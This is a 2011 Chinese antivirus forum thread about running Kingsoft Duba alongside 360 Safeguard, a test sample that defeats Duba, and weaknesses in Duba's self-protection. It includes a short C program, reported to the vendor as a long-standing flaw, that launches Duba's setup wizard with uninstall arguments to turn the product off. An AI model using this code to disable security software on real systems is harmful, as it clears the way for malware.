毒霸+360卫士似乎无冲突---以及干掉毒霸的一个样本---以及毒霸对大文件通拦为网购木马

insight

我怎么记得昨天测试这个样本，毒霸行为防御提示攻击系统已经拦截，而且也提示自动拦截了创建启动项？毒霸嘛事没有。难道我记错了？

insight

jefffire 发表于 2011-6-19 15:04
垃圾代码种类太多了，有无穷种可能，任何周期性的数据排列都可以来作为代码，将这个作为启发还是太弱

那就试试别的填充方式，看看能不能拦截

leisong

绅博周幸 发表于 2011-6-19 14:59

自保护默认就是已开启。

leisong

jefffire 发表于 2011-6-19 15:00
冲突不是指不能拦截加载驱动，而是加载驱动前的注册表操作不能拦截了

是这个吗，在毒霸和卫士一起开着的情况下

李白vs苏轼

毒霸设计存在逻辑上的问题，要过自保不难 ，希望加强

insight

李白vs苏轼 发表于 2011-6-19 15:15
毒霸设计存在逻辑上的问题，要过自保不难 ，希望加强

求真相，私下聊聊:)

李白vs苏轼

insight 发表于 2011-6-19 15:22
求真相，私下聊聊:)

希望把这个存在很久的先搞好把，，

1. #include<windows.h>
   
2. 
   
3. int main(void)
   
4. {
   
5.    ShellExecute(NULL,
   
6.            "open",
   
7.            "C:\\Program Files\\Common Files\\Kingsoft\\kiscommon\\setupwiz.exe",
   
8.            "/u /kav",
   
9.            NULL,
   
10.            SW_SHOWNORMAL);
    
11. }

复制代码

jefffire

李白vs苏轼 发表于 2011-6-19 15:27
希望把这个存在很久的先搞好把，，

怎么又是这个

李白vs苏轼

jefffire 发表于 2011-6-19 15:29
怎么又是这个

因为存在了 这么久 了 还一直可以利用。。。。。。有很多个月了把

xxqqwx

一起装过。